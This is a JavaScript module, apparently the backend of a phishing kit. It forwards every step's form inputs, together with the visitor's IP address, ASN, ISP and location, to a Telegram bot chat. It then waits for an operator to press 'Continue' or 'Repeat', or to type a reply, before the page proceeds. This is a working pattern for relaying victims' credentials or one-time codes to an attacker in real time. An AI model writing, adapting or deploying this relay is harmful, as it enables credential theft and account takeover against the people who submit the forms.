import CONFIG from "../config";

const BASE = `https://api.telegram.org/bot${CONFIG.BOT_TOKEN}`;

let lastUpdateId = 0;

export async function sendToTelegram(stepLabel, inputs, visitorInfo) {
  const inputLines = Object.entries(inputs)
    .map(([k, v]) => `• ${k}: ${v}`)
    .join("\n");

  const text =
    `📋 *${stepLabel}*\n\n` +
    `📝 *Inputs:*\n${inputLines}\n\n` +
    `🌍 *Visitor Info:*\n` +
    `• IP: \`${visitorInfo?.ip}\`\n` +
    `• ASN: \`${visitorInfo?.asn}\`\n` +
    `• ISP: \`${visitorInfo?.isp}\`\n` +
    `• Location: \`${visitorInfo?.location}\``;

  await fetch(`${BASE}/sendMessage`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      chat_id: CONFIG.CHAT_ID,
      text,
      parse_mode: "Markdown",
      reply_markup: {
        inline_keyboard: [
          [
            { text: "✅ Continue", callback_data: "continue" },
            { text: "🔁 Repeat", callback_data: "empty" },
          ],
        ],
      },
    }),
  });
}

export async function pollForReply(timeoutMs = 120000) {
  const interval = 3000;
  const start = Date.now();

  return new Promise((resolve, reject) => {
    async function poll() {
      if (Date.now() - start > timeoutMs) {
        reject(new Error("Timeout waiting for bot reply"));
        return;
      }

      try {
        const res = await fetch(
          `${BASE}/getUpdates?offset=${lastUpdateId + 1}&timeout=10`
        );
        const data = await res.json();

        if (data.result && data.result.length > 0) {
          const update = data.result[data.result.length - 1];
          lastUpdateId = update.update_id;

          // ── Inline keyboard button pressed ──────────────────────
          if (update.callback_query) {
            const cb = update.callback_query;

            // Acknowledge the callback so Telegram removes the spinner
            await fetch(`${BASE}/answerCallbackQuery`, {
              method: "POST",
              headers: { "Content-Type": "application/json" },
              body: JSON.stringify({ callback_query_id: cb.id }),
            });

            if (cb.data === "continue") {
              // Remove the inline keyboard from the original message
              await fetch(`${BASE}/editMessageReplyMarkup`, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify({
                  chat_id: CONFIG.CHAT_ID,
                  message_id: cb.message.message_id,
                  reply_markup: { inline_keyboard: [] },
                }),
              });
              resolve("continue");
              return;
            }

            if (cb.data === "empty") {
              // Remove the keyboard and let the frontend know to repeat
              await fetch(`${BASE}/editMessageReplyMarkup`, {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify({
                  chat_id: CONFIG.CHAT_ID,
                  message_id: cb.message.message_id,
                  reply_markup: { inline_keyboard: [] },
                }),
              });
              resolve("empty");
              return;
            }
          }

          // ── Plain text reply from operator ───────────────────────
          const text =
            update.message?.text ||
            update.channel_post?.text ||
            null;

          if (text) {
            resolve(text);
            return;
          }
        }
      } catch (e) {
        // keep polling
      }

      setTimeout(poll, interval);
    }

    poll();
  });
}